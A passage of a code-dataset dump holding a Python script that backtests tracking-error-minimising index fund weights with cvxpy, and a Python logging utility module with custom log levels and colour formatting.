16, "usage_type": "call"}]}
+{"seq_id": "4928489", "text": "# -*- coding: utf-8 -*-\n#%% NumPyの読み込み\nimport numpy as np\n# SciPyのstatsモジュールの読み込み\nimport scipy.stats as st\n# CVXPYの読み込み\nimport cvxpy as cvx\n# Pandasの読み込み\nimport pandas as pd\n# MatplotlibのPyplotモジュールの読み込み\nimport matplotlib.pyplot as plt\n# 日本語フォントの設定\nfrom matplotlib.font_manager import FontProperties\nimport sys\nif sys.platform.startswith('win'):\n FontPath = 'C:\\\\Windows\\\\Fonts\\\\meiryo.ttc'\nelif sys.platform.startswith('darwin'):\n FontPath = '/System/Library/Fonts/ヒラギノ角ゴシック W4.ttc'\nelif sys.platform.startswith('linux'):\n FontPath = '/usr/share/fonts/truetype/takao-gothic/TakaoPGothic.ttf'\njpfont = FontProperties(fname=FontPath)\n#%% 収益率データの読み込みとベンチマークの生成\nR = pd.read_csv('asset_return_data.csv', index_col=0)\n# R = R.asfreq(pd.infer_freq(R.index)) # この行は無視する\nT = R.shape[0]\nN = R.shape[1]\nnp.random.seed(8888)\nBenchmarkIndex = R.dot(np.tile(1.0/N, N)) + st.norm(0.0, 3.0).rvs(T)\n#%% トラッキングエラー最小化問題のバックテスト\nMovingWindow = 96\nBackTesting = T - MovingWindow\nV_Tracking = np.zeros(BackTesting)\nWeight = cvx.Variable(N)\nError = cvx.Variable(MovingWindow)\nTrackingError = cvx.sum_squares(Error)\nAsset_srT = R / np.sqrt(MovingWindow)\nIndex_srT = BenchmarkIndex / np.sqrt(MovingWindow)\nfor Month in range(0, BackTesting):\n Asset = Asset_srT.values[Month:(Month + MovingWindow), :]\n Index = Index_srT.values[Month:(Month + MovingWindow)]\n Min_TrackingError = cvx.Problem(cvx.Minimize(TrackingError),\n [Index - Asset @ Weight == Error,\n cvx.sum(Weight) == 1.0,\n Weight >= 0.0])\n Min_TrackingError.solve(solver=cvx.ECOS)\n V_Tracking[Month] = R.values[Month + MovingWindow, :].dot(Weight.value)\n#%% バックテストの結果のグラフ\nfig1 = plt.figure(1, facecolor='w')\nplt.plot(list(range(1, BackTesting + 1)), BenchmarkIndex[MovingWindow:], 'k-')\nplt.plot(list(range(1, BackTesting + 1)), V_Tracking, 'k--')\nplt.legend([u'ベンチマーク・インデックス', u'インデックス・ファンド'],\n loc='best', frameon=False, prop=jpfont)\nplt.xlabel(u'運用期間(年)', fontproperties=jpfont)\nplt.ylabel(u'収益率(%)', fontproperties=jpfont)\nplt.xticks(list(range(12, BackTesting + 1, 12)),\n pd.date_range(R.index[MovingWindow], periods=BackTesting//12,\n freq='AS').year)\nplt.show()\n", "sub_path": "python/pyfin_min_tracking_error_ver1_1.py", "file_name": "pyfin_min_tracking_error_ver1_1.py", "file_ext": "py", "file_size_in_byte": 2589, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "sys.platform.startswith", "line_number": 15, "usage_type": "call"}, {"api_name": "sys.platform", "line_number": 15, "usage_type": "attribute"}, {"api_name": "sys.platform.startswith", "line_number": 17, "usage_type": "call"}, {"api_name": "sys.platform", "line_number": 17, "usage_type": "attribute"}, {"api_name": "sys.platform.startswith", "line_number": 19, "usage_type": "call"}, {"api_name": "sys.platform", "line_number": 19, "usage_type": "attribute"}, {"api_name": "matplotlib.font_manager.FontProperties", "line_number": 21, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 27, "usage_type": "attribute"}, {"api_name": "numpy.tile", "line_number": 28, "usage_type": "call"}, {"api_name": "scipy.stats.norm", "line_number": 28, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 28, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 32, "usage_type": "call"}, {"api_name": "cvxpy.Variable", "line_number": 33, "usage_type": "call"}, {"api_name": "cvxpy.Variable", "line_number": 34, "usage_type": "call"}, {"api_name": "cvxpy.sum_squares", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 37, "usage_type": "call"}, {"api_name": "cvxpy.Problem", "line_number": 41, "usage_type": "call"}, {"api_name": "cvxpy.Minimize", "line_number": 41, "usage_type": "call"}, {"api_name": "cvxpy.sum", "line_number": 43, "usage_type": "call"}, {"api_name": "cvxpy.ECOS", "line_number": 45, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 48, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 48, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 49, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 50, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 50, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 51, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 51, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 53, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 53, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 54, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 55, "usage_type": "name"}, {"api_name": "pandas.date_range", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 58, "usage_type": "name"}]}
+{"seq_id": "9320961", "text": "\"\"\"\nUnicorn core.logutils module\nUnicorn module which provides common logging functions. \nIn order to initialize logger function init_logger should be used.\n\"\"\"\n\nimport sys\nimport os\nimport logging\nimport copy\nimport shutil\nimport re\nfrom datetime import datetime\nfrom threading import Lock\n\ntry:\n from core import logutils_conversions\n from core import environment_preparation\nexcept ImportError:\n import logutils_conversions\n import environment_preparation\n\ntry:\n import colorama\nexcept ImportError as e:\n colorama = None\nelse:\n colorama.init() \n\nloglock = Lock()\n \n# PATCHING CUSTOM LEVELS\nlogging.H1 = 99\nlogging.H2 = 98\nlogging.H3 = 97\nlogging.PLAIN = 29\nlogging.FRAME = 28\nlogging.TABLE = 27\nlogging.VERBOSE = 21\n\nlevel_styles = {}\nmessage_styles = {}\n\n\n\n# ==============================================================================\nclass EnhancedLogger(logging.getLoggerClass()):\n \"\"\"\n Logger class with additional methods / log levels.\n \"\"\"\n def __init__(self, name, level = logging.NOTSET):\n super().__init__(name, level)\n logging.addLevelName(logging.H1, \"H1\")\n logging.addLevelName(logging.H2, \"H2\")\n logging.addLevelName(logging.H3, \"H3\")\n logging.addLevelName(logging.TABLE, \"TABLE\")\n logging.addLevelName(logging.FRAME, \"FRAME\")\n logging.addLevelName(logging.PLAIN, \"PLAIN\")\n logging.addLevelName(logging.VERBOSE, \"VERBOSE\")\n \n def h1(self, msg, *args, **kwargs):\n if self.isEnabledFor(logging.H1):\n msg = logutils_conversions._string_to_h1(msg)\n self._log(logging.H1, msg, args, **kwargs)\n \n def h2(self, msg, *args, **kwargs):\n if self.isEnabledFor(logging.H2):\n msg = logutils_conversions._string_to_h2(msg)\n self._log(logging.H2, msg, args, **kwargs)\n \n def h3(self, msg, *args, **kwargs):\n if self.isEnabledFor(logging.H3):\n msg = logutils_conversions._string_to_h3(msg)\n self._log(logging.H3, msg, args, **kwargs)\n \n def table(self, msg, *args, **kwargs):\n if self.isEnabledFor(logging.TABLE):\n msg = logutils_conversions._table_to_string(msg)\n self._log(logging.TABLE, msg, args, **kwargs)\n \n def frame(self, msg, *args, **kwargs):\n if self.isEnabledFor(logging.FRAME):\n msg = logutils_conversions._string_to_framed_string(msg)\n self._log(logging.FRAME, msg, args, **kwargs)\n \n def com(self, msg, *args, **kwargs):\n if self.isEnabledFor(logging.PLAIN):\n self._log(logging.PLAIN, msg, args, **kwargs)\n \n def comment(self, msg, *args, **kwargs):\n if self.isEnabledFor(logging.PLAIN):\n self._log(logging.PLAIN, msg, args, **kwargs)\n \n def plain(self, msg, *args, **kwargs):\n if self.isEnabledFor(logging.PLAIN):\n self._log(logging.PLAIN, msg, args, **kwargs)\n \n def verbose(self, msg, *args, **kwargs):\n if self.isEnabledFor(logging.VERBOSE):\n msg = logutils_conversions._verbose_message_to_string(msg)\n self._log(logging.VERBOSE, msg, args, **kwargs)\n\n def configure(self, log_config={}, file=\"\"):\n \"\"\"\n Common function which initializes logger, makes target log directories and creates file.\n Args:\n name (String) - name of the logger\n log_config (dict) - optional - configuration for the logger. New entries will override default configuration.\n file (String) - optional - fixed path to the logfile\n Returns:\n logging object\n \"\"\"\n\n # TODO function that initialize default values\n log_c = {\n \"log_fmt\": \"%(asctime)-16s - %(levelname)-8s - %(message)s\",\n \"log_path\": \"\",\n \"log_colors\": True,\n \"log_default_font\": \"\",\n \"log_default_back\": \"\",\n \"log_default_style\": \"\",\n \"log_debug_font\": \"white\",\n \"log_debug_back\": \"\",\n \"log_debug_style\": \"\",\n \"log_info_font\": \"green\",\n \"log_info_back\": \"\",\n \"log_info_style\": \"bright\",\n \"log_warning_font\": \"yellow\",\n \"log_warning_back\": \"\",\n \"log_warning_style\": \"bright\",\n \"log_error_font\": \"red\",\n \"log_error_back\": \"\",\n \"log_error_style\": \"bright\",\n \"log_critical_font\": \"white\",\n \"log_critical_back\": \"red\",\n \"log_critical_style\": \"bright\",\n \"log_header_font\": \"cyan\",\n \"log_header_back\": \"\",\n \"log_header_style\": \"bright\",\n \"log_verbose_font\": \"magenta\",\n \"log_verbose_back\": \"\",\n \"log_verbose_style\": \"bright\",\n \"log_strong_font\": \"yellow\",\n \"log_strong_back\": \"black\",\n \"log_strong_style\": \"\",\n \"log_send_font\": \"cyan\",\n \"log_send_back\": \"\",\n \"log_send_style\": \"bright\",\n \"log_receive_font\": \"yellow\",\n \"log_receive_back\": \"\",\n \"log_receive_style\": \"bright\",\n \"log_file_max_size\": \"0\",\n \"log_file_max_count\": \"0\",\n \"log_width\": 120,\n \"test_file\": \"\",\n \"file\": \"\" }\n log_c.update(log_config)\n logutils_conversions.LINE_WIDTH = log_c[\"log_width\"]\n if any(sub in str(log_c[\"log_colors\"]).lower() for sub in [\"1\", \"enable\", \"true\", \"yes\"]):\n log_c[\"log_colors\"] = True\n\n # TODO move to function close handlers\n handlers = self.handlers[:]\n for hdlr in handlers:\n hdlr.close()\n self.removeHandler(hdlr)\n\n # TODO move to function set logging level, it would be good to use configuration parameter instead of directly parsing sys.argv\n if any(\"debug\" in ar.lower() for ar in sys.argv):\n level_to_set = logging.DEBUG\n else:\n level_to_set = logging.INFO\n self.setLevel(logging.DEBUG)\n self.propagate = 0\n\n # TODO move to function set formatter\n fmt = log_c[\"log_fmt\"]\n\n if colorama and log_c[\"log_colors\"] is True:\n handler = ColorStreamHandler(sys.stdout)\n cc_fmt = ColorFormatter(fmt)\n cc_fmt.configure(log_c)\n handler.setFormatter(cc_fmt)\n else:\n handler = logging.StreamHandler()\n c_fmt = CustomFormatter(fmt)\n handler.setFormatter(c_fmt)\n handler.setLevel(level_to_set)\n self.addHandler(handler)\n timestamp = datetime.now().strftime(\"%Y-%m-%d_%H.%M.%S\")\n\n # TODO move to function set file handler\n log_dir_path = \"\"\n log_file_path = \"\"\n if log_c[\"log_path\"] and log_c[\"test_file\"]:\n log_dir_path = log_c[\"log_path\"]\n if os.path.isabs(log_dir_path): pass\n else: \n log_dir_path = os.path.realpath(os.path.join(os.path.dirname(__file__), \"..\", log_dir_path))\n testname = os.path.basename(log_c[\"test_file\"])\n try:\n testname = os.path.splitext(testname)[0]\n except Exception as e:\n print(\"Could not remove extension from file named: {}. Skipping.\".format(testname))\n log_dir_name = \"{}_{}\".format(testname, timestamp)\n log_dir_path = os.path.realpath(os.path.join(log_c[\"log_path\"], log_dir_name))\n log_file_name = \"{}_{}_{}.log\".format(testname, timestamp, self.name)\n log_file_path = os.path.join(log_dir_path, log_file_name)\n elif file:\n log_dir_path = os.path.dirname(file)\n log_file_path = file\n if log_dir_path and not os.path.exists(log_dir_path):\n try:\n os.makedirs(log_dir_path)\n except Exception as ex:\n print(\"ERROR: Log directory {} could not be created\".format(log_dir_path))\n print(\n \"Please ensure that\\n\\t\\\"{}\\\"\\ndirectory exists or Unicorn has sufficient rights to create it.\".format(\n log_dir_path))\n raise ex from None\n\n if log_c[\"log_path\"] and file and os.path.isfile(file):\n shutil.copyfile(file, log_file_path)\n os.remove(file)\n\n if log_file_path:\n lfmc_text = str(log_c[\"log_file_max_size\"]).upper()\n lfmc_num = int(''.join(str(d) for d in [int(s) for s in list(lfmc_text) if s.isdigit()]))\n if lfmc_text.endswith(\"MB\") or lfmc_text.endswith(\"M\"):\n log_c[\"log_file_max_size\"] = lfmc_num * 1024 * 1024\n elif lfmc_text.endswith(\"KB\") or lfmc_text.endswith(\"K\"):\n log_c[\"log_file_max_size\"] = lfmc_num * 1024\n else:\n log_c[\"log_file_max_size\"] = lfmc_num\n if log_file_path:\n f_fmt = CustomFormatter(fmt)\n if log_c[\"log_file_max_size\"] > 0:\n from logging.handlers import RotatingFileHandler\n fh = RotatingFileHandler(log_file_path, maxBytes=log_c[\"log_file_max_size\"],\n backupCount=int(log_c[\"log_file_max_count\"]) )\n else:\n fh = logging.FileHandler(log_file_path)\n fh.setLevel(logging.DEBUG)\n fh.setFormatter(f_fmt)\n self.addHandler(fh)\n return self\n\n def close(self):\n \"\"\"\n Function to remove handlers and shut down the logger\n Args:\n logger (logger object)\n Returns:\n None\n \"\"\"\n try:\n handlers = self.handlers[:]\n for handler in handlers:\n handler.close()\n self.removeHandler(handler)\n del self\n except Exception as ex:\n pass \n\n\nclass ColorStreamHandler(logging.StreamHandler):\n \"\"\"\n StreamHandler with customized color output.\n \"\"\"\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n def emit(self, record):\n try:\n loglock.acquire()\n message = self.format(record)\n self.stream.write(message)\n self.stream.write(getattr(self, 'terminator', '\\n'))\n self.flush()\n except (KeyboardInterrupt, SystemExit) as e:\n raise e\n except Exception:\n self.handleError(record)\n finally:\n loglock.release()\n\nclass CustomFormatter(logging.Formatter):\n \"\"\"\n Formatter which selects modified log formats depending on the message LEVEL\n \"\"\"\n def __init__(self, fmt):\n self.general_fmt = \"%(asctime)-16s - %(levelname)-8s - %(message)s\"\n self.plain_fmt = \"%(asctime)-16s - %(message)s\"\n self.no_fmt = \"%(message)s\"\n # self.verbose_fmt = \"%(asctime)-16s - [ Logged from: %(module)s; line: %(lineno)d ]:\\n %(msg)s\"\n self.verbose_fmt = \"\\n %(msg)s\"\n if fmt: \n self.general_fmt = fmt\n super().__init__(fmt = self.general_fmt)\n\n def format(self, record, *args, **kwargs):\n new_record = copy.copy(record)\n format_orig = self._style._fmt\n if new_record.levelno == logging.DEBUG:\n self._style._fmt = self.general_fmt\n elif new_record.levelno == logging.INFO:\n self._style._fmt = self.general_fmt\n elif new_record.levelno == logging.WARNING or new_record.levelno == logging.WARN:\n self._style._fmt = self.general_fmt\n elif new_record.levelno == logging.ERROR or new_record.levelno == logging.CRITICAL:\n self._style._fmt = self.general_fmt\n elif new_record.levelno == logging.H1:\n self._style._fmt = self.no_fmt\n elif new_record.levelno == logging.H2:\n self._style._fmt = self.plain_fmt\n elif new_record.levelno == logging.H3:\n self._style._fmt = self.plain_fmt \n elif new_record.levelno == logging.TABLE:\n self._style._fmt = self.no_fmt\n elif new_record.levelno == logging.FRAME:\n self._style._fmt = self.no_fmt\n elif new_record.levelno == logging.PLAIN:\n self._style._fmt = self.plain_fmt \n elif new_record.levelno == logging.VERBOSE:\n self._style._fmt = self.verbose_fmt\n else:\n self._style._fmt = self.no_fmt\n result = logging.Formatter.format(self, new_record)\n self._style._fmt = format_orig\n return result\n\n\nclass ColorFormatter(CustomFormatter):\n \"\"\"\n Formatter which adds colors to messages going to the screen depending on message LEVEL\n \"\"\"\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.color_send = \"\"\n self.color_receive = \"\"\n self.color_strong = \"\"\n self.regex_send = re.compile(\"(.*?\\|.?\\-\\-\\>.*?\\|.)(.*)\", re.IGNORECASE | re.MULTILINE)\n self.regex_receive = re.compile(\"(.*?\\|.?\\<\\-\\-.*?\\|.)(.*)\", re.IGNORECASE | re.MULTILINE)\n self.regex_strong = re.compile(\"\\[(.*)\\]\", re.IGNORECASE | re.MULTILINE)\n\n def create_color_entry(self, colorama_assignments, style_name_lowercase):\n \"\"\"Method which assigns colorama style basing on global configuration stored in self.log_conf, \n styles dictionary colorama_dict and name of the style defined in style_name_lowercase\n self.log_conf - generated framework configuration for the logs (all parameters with log_ prefix) \n - taken from global config file, local config file, command line args and default settings.\n Args:\n colorama_assignments(dict) - assignments of logging level and colorama style\n style_name_lowercase(string) - value of configuration parameter. e.g. yellow\n Returns:\n colorama style(colorama attribute) - e.g. colorama.Style.BRIGHT\"\"\"\n try:\n log_param_value = self.log_conf[style_name_lowercase]\n except KeyError as e:\n log_param_value = \"\"\n try:\n return colorama_assignments[log_param_value]\n except (KeyError, Exception) as e:\n print(\"WARNING: Style or color name \\\"{}\\\" for {} was not recognized. Empty value will be used.\".format(log_param_value, style_name_lowercase))\n return \"\" \n \n def configure(self, log_conf):\n \"\"\"\n Method to set configuration of ColorFormatter from dictionary with log_ parameters.\n Args:\n log_conf(dictionary): configuration of the logger, keys are prefixed with log_\n Returns:\n None\n \"\"\"\n self.log_conf = log_conf\n self.level_styles = {\n logging.DEBUG: colorama.Style.BRIGHT + colorama.Fore.WHITE,\n logging.INFO: colorama.Style.BRIGHT + colorama.Fore.GREEN,\n logging.WARN: colorama.Style.BRIGHT + colorama.Fore.YELLOW,\n logging.WARNING: colorama.Style.BRIGHT + colorama.Fore.YELLOW,\n logging.ERROR: colorama.Style.BRIGHT + colorama.Fore.RED,\n logging.CRITICAL: colorama.Style.BRIGHT + colorama.Back.RED + colorama.Fore.WHITE\n }\n self.message_styles = {\n logging.DEBUG: colorama.Style.BRIGHT + colorama.Fore.WHITE,\n logging.INFO: colorama.Style.BRIGHT + colorama.Fore.GREEN,\n logging.WARN: colorama.Style.BRIGHT + colorama.Fore.YELLOW,\n logging.WARNING: colorama.Style.BRIGHT + colorama.Fore.YELLOW,\n logging.ERROR: colorama.Style.BRIGHT + colorama.Fore.RED,\n logging.CRITICAL: colorama.Style.BRIGHT + colorama.Back.RED + colorama.Fore.WHITE,\n logging.H1: colorama.Style.BRIGHT + colorama.Fore.CYAN,\n logging.H2: colorama.Style.BRIGHT + colorama.Fore.CYAN,\n logging.H3: colorama.Style.BRIGHT + colorama.Fore.CYAN,\n logging.VERBOSE: colorama.Style.BRIGHT + colorama.Fore.MAGENTA,\n logging.FRAME: \"\",\n logging.TABLE: \"\",\n logging.PLAIN: \"\"\n }\n self.colorama_styles = {\n \"bright\": colorama.Style.BRIGHT,\n \"dim\": colorama.Style.DIM,\n \"none\": \"\",\n \"\": \"\"\n } \n self.colorama_backgrounds = {\n \"red\": colorama.Back.RED,\n \"white\": colorama.Back.WHITE,\n \"green\": colorama.Back.GREEN,\n \"yellow\": colorama.Back.YELLOW,\n \"blue\": colorama.Back.BLUE,\n \"cyan\": colorama.Back.CYAN,\n \"magenta\": colorama.Back.MAGENTA,\n \"black\": colorama.Back.BLACK,\n \"\": \"\"\n } \n self.colorama_fonts = {\n \"red\": colorama.Fore.RED,\n \"white\": colorama.Fore.WHITE,\n \"green\": colorama.Fore.GREEN,\n \"yellow\": colorama.Fore.YELLOW,\n \"blue\": colorama.Fore.BLUE,\n \"cyan\": colorama.Fore.CYAN,\n \"magenta\": colorama.Fore.MAGENTA,\n \"black\": colorama.Fore.BLACK,\n \"\": \"\"\n }\n self.message_styles = {\n logging.DEBUG: self.create_color_entry(self.colorama_styles, \"log_debug_style\") \\\n + self.create_color_entry(self.colorama_backgrounds, \"log_debug_back\") \\\n + self.create_color_entry(self.colorama_fonts, \"log_debug_font\"),\n logging.INFO: self.create_color_entry(self.colorama_styles, \"log_info_style\") \\\n + self.create_color_entry(self.colorama_backgrounds, \"log_info_back\") \\\n + self.create_color_entry(self.colorama_fonts, \"log_info_font\"),\n logging.WARN: self.create_color_entry(self.colorama_styles, \"log_warning_style\") \\\n + self.create_color_entry(self.colorama_backgrounds, \"log_warning_back\") \\\n + self.create_color_entry(self.colorama_fonts, \"log_warning_font\"),\n logging.WARNING: self.create_color_entry(self.colorama_styles, \"log_warning_style\") \\\n + self.create_color_entry(self.colorama_backgrounds, \"log_warning_back\") \\\n + self.create_color_entry(self.colorama_fonts, \"log_warning_font\"),\n logging.ERROR: self.create_color_entry(self.colorama_styles, \"log_error_style\") \\\n + self.create_color_entry(self.colorama_backgrounds, \"log_error_back\") \\\n + self.create_color_entry(self.colorama_fonts, \"log_error_font\"),\n logging.CRITICAL: self.create_color_entry(self.colorama_styles, \"log_critical_style\") \\\n + self.create_color_entry(self.colorama_backgrounds, \"log_critical_back\") \\\n + self.create_color_entry(self.colorama_fonts, \"log_critical_font\"),\n logging.H1: self.create_color_entry(self.colorama_styles, \"log_header_style\") \\\n + self.create_color_entry(self.colorama_backgrounds, \"log_header_back\") \\\n + self.create_color_entry(self.colorama_fonts, \"log_header_font\"),\n logging.H2: self.create_color_entry(self.colorama_styles, \"log_header_style\") \\\n + self.create_color_entry(self.colorama_backgrounds, \"log_header_back\") \\\n + self.create_color_entry(self.colorama_fonts, \"log_header_font\"), \n logging.H3: self.create_color_entry(self.colorama_styles, \"log_header_style\") \\\n + self.create_color_entry(self.colorama_backgrounds, \"log_header_back\") \\\n + self.create_color_entry(self.colorama_fonts, \"log_header_font\"), \n logging.VERBOSE: self.create_color_entry(self.colorama_styles, \"log_verbose_style\") \\\n + self.create_color_entry(self.colorama_backgrounds, \"log_verbose_back\") \\\n + self.create_color_entry(self.colorama_fonts, \"log_verbose_font\") \n }\n self.level_styles = dict(self.message_styles)\n self.color_send = self.create_color_entry(self.colorama_styles, \"log_send_style\") \\\n + self.create_color_entry(self.colorama_backgrounds, \"log_send_back\") \\\n + self.create_color_entry(self.colorama_fonts, \"log_send_font\")\n self.color_receive = self.create_color_entry(self.colorama_styles, \"log_receive_style\") \\\n + self.create_color_entry(self.colorama_backgrounds, \"log_receive_back\") \\\n + self.create_color_entry(self.colorama_fonts, \"log_receive_font\")\n self.color_strong = self.create_color_entry(self.colorama_styles, \"log_strong_style\") \\\n + self.create_color_entry(self.colorama_backgrounds, \"log_strong_back\") \\\n + self.create_color_entry(self.colorama_fonts, \"log_strong_font\")\n \n def _apply_special_styles(self, message):\n \"\"\"\n Method to apply special style to the message which matches expected format (based on regex search).\n It is called from \"format\" method\n It returns same message if no special match is found.\n Args:\n message (String): log entry to add the style\n Returns:\n message (String): colorized log entry\n \"\"\"\n if self.regex_send.search(message):\n return self.regex_send.sub(\"\\\\1\" + self.color_send + \"\\\\2\" + colorama.Style.RESET_ALL, str(message))\n elif self.regex_receive.search(message):\n return self.regex_receive.sub(\"\\\\1\" + self.color_receive + \"\\\\2\" + colorama.Style.RESET_ALL, str(message))\n elif self.regex_strong.search(message):\n return self.regex_strong.sub(self.color_strong + \"[\\\\1]\" + colorama.Style.RESET_ALL, str(message))\n else:\n return message\n\n def format(self, record, *args, **kwargs):\n \"\"\"\n Method to apply all color formats basing on self.level_styles and self.message_styles dictionaries.\n Args:\n record (String): log entry to add the style\n Returns:\n result (String): formatted log entry\n \"\"\" \n new_record = copy.copy(record) \n if isinstance(new_record.msg, str) and new_record.levelno == logging.PLAIN:\n new_record.msg = self._apply_special_styles(new_record.msg) \n if new_record.levelno in self.level_styles:\n new_record.levelname = \"{color_begin}{level}{color_end}\".format(\n color_begin = self.level_styles[new_record.levelno],\n level = new_record.levelname,\n color_end = colorama.Style.RESET_ALL,\n ) \n if new_record.levelno in self.message_styles:\n new_record.msg = \"{color_begin}{msg}{color_end}\".format(\n color_begin = self.message_styles[new_record.levelno],\n msg = new_record.msg,\n color_end = colorama.Style.RESET_ALL,\n )\n result = super(ColorFormatter, self).format(new_record, *args, **kwargs)\n return result\n\nlogging.setLoggerClass(EnhancedLogger)\n \n\ndef init_logger(name = \"log\", log_config = {}, file = \"\"): \n \"\"\"\n External function which initializes logger, makes target log directories and creates file.\n Args:\n name (String) - name of the logger\n log_config (dict) - optional - configuration for the logger. New entries will override default configuration.\n file (String) - optional - fixed path to the logfile\n Returns:\n logging object\n \"\"\"\n logger = logging.getLogger(name)\n logger.configure(log_config, file)\n return logger\n \n\nif __name__ == \"__main__\":\n\n logger = init_logger(\"test\")\n logger = init_logger(\"test\")\n\n logger.debug(\"This is a debug!\")\n logger.info(\"This is an info!\")\n logger.warning(\"This is a warning!\")\n logger.error(\"This is an error!\")\n logger.critical(\"This is a critical!\")\n\n logger.h1(\"1. Header\")\n logger.h2(\"1.1. Header\")\n logger.h3(\"1.1.1 Header\")\n\n logger.table([[\"Name\", \"Value\"],[1,2],[10,20],[30,40]])\n logger.com(\"Path [ AAA ] format\")\n logger.com(\"| --> D | Send format\")\n logger.com(\"| <-- D | Receive format\")\n logger.verbose([\n \"This is a long message\",\n \"which explains in details\",\n \"what is going on here\"\n ])\n logger.frame(\"Used for generic messages which should be emphasized\")\n logger.frame(\"Used for generic messages which should be emphasized\\n - like communication with the module\")\n logger.frame([\n \"Used for generic messages which should be emphasized\",\n \"- like communication with the module\"])\n try:\n i = 3/0\n except Exception as e:\n logger.verbose(\"You tried to do action which is not allowed. Handling exception.\")\n logger.info(\"[ c:\\\\temp ]\")\n", "sub_path": "unicorn_core/logutils.py", "file_name": "logutils.py", "file_ext": "py", "file_size_in_byte": 24390, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "colorama.init", "line_number": 28, "usage_type": "call"}, {"api_name": "threading.Lock", "line_number": 30, "usage_type": "call"}, {"api_name": "logging.H1", "line_number": 33, "usage_type": "attribute"}, {"api_name": "logging.H2", "line_number": 34, "usage_type": "attribute"}, {"api_name": "logging.H3", "line_number": 35, "usage_type": "attribute"}, {"api_name": "logging.PLAIN", "line_number": 36, "usage_type": "attribute"}, {"api_name": "logging.FRAME", "line_number": 37, "usage_type": "attribute"}, {"api_name": "logging.TABLE", "line_number": 38, "usage_type": "attribute"}, {"api_name": "logging.VERBOSE", "line_number": 39, "usage_type": "attribute"}, {"api_name": "logging.getLoggerClass", "line_number": 47, "usage_type": "call"}, {"api_name": "logging.NOTSET", "line_number": 51, "usage_type": "attribute"}, {"api_name": "logging.addLevelName", "line_number": 53, "usage_type": "call"}, {"api_name": "logging.H1", "line_number": 53, "usage_type": "attribute"}, {"api_name": "logging.addLevelName", "line_number": 54, "usage_type": "call"}, {"api_name": "logging.H2", "line_number": 54, "usage_type": "attribute"}, {"api_name": "logging.addLevelName", "line_number": 55, "usage_type": "call"}, {"api_name": "logging.H3", "line_number": 55, "usage_type": "attribute"}, {"api_name": "logging.addLevelName", "line_number": 56, "usage_type": "call"}, {"api_name": "logging.TABLE", "line_number": 56, "usage_type": "attribute"}, {"api_name": "logging.addLevelName", "line_number": 57, "usage_type": "call"}, {"api_name": "logging.FRAME", "line_number": 57, "usage_type": "attribute"}, {"api_name": "logging.addLevelName", "line_number": 58, "usage_type": "call"}, {"api_name": "logging.PLAIN", "line_number": 58, "usage_type": "attribute"}, {"api_name": "logging.addLevelName", "line_number": 59, "usage_type": "call"}, {"api_name": "logging.VERBOSE", "line_number": 59, "usage_type": "attribute"}, {"api_name": "logging.H1", "line_number": 62, "usage_type": "attribute"}, {"api_name": "logutils_conversions._string_to_h1", "line_number": 63, "usage_type": "call"}, {"api_name": "logging.H1", "line_number": 64, "usage_type": "attribute"}, {"api_name": "logging.H2", "line_number": 67, "usage_type": "attribute"}, {"api_name": "logutils_conversions._string_to_h2", "line_number": 68, "usage_type": "call"}, {"api_name": "logging.H2", "line_number": 69, "usage_type": "attribute"}, {"api_name": "logging.H3", "line_number": 72, "usage_type": "attribute"}, {"api_name": "logutils_conversions._string_to_h3", "line_number": 73, "usage_type": "call"}, {"api_name": "logging.H3", "line_number": 74, "usage_type": "attribute"}, {"api_name": "logging.TABLE", "line_number": 77, "usage_type": "attribute"}, {"api_name": "logutils_conversions._table_to_string", "line_number": 78, "usage_type": "call"}, {"api_name": "logging.TABLE", "line_number": 79, "usage_type": "attribute"}, {"api_name": "logging.FRAME", "line_number": 82, "usage_type": "attribute"}, {"api_name": "logutils_conversions._string_to_framed_string", "line_number": 83, "usage_type": "call"}, {"api_name": "logging.FRAME", "line_number": 84, "usage_type": "attribute"}, {"api_name": "logging.PLAIN", "line_number": 87, "usage_type": "attribute"}, {"api_name": "logging.PLAIN", "line_number": 88, "usage_type": "attribute"}, {"api_name": "logging.PLAIN", "line_number": 91, "usage_type": "attribute"}, {"api_name": "logging.PLAIN", "line_number": 92, "usage_type": "attribute"}, {"api_name": "logging.PLAIN", "line_number": 95, "usage_type": "attribute"}, {"api_name": "logging.PLAIN", "line_number": 96, "usage_type": "attribute"}, {"api_name": "logging.VERBOSE", "line_number": 99, "usage_type": "attribute"}, {"api_name": "logutils_conversions._verbose_message_to_string", "line_number": 100, "usage_type": "call"}, {"api_name": "logging.VERBOSE", "line_number": 101, "usage_type": "attribute"}, {"api_name": "logutils_conversions.LINE_WIDTH", "line_number": 158, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 169, "usage_type": "attribute"}, {"api_name": 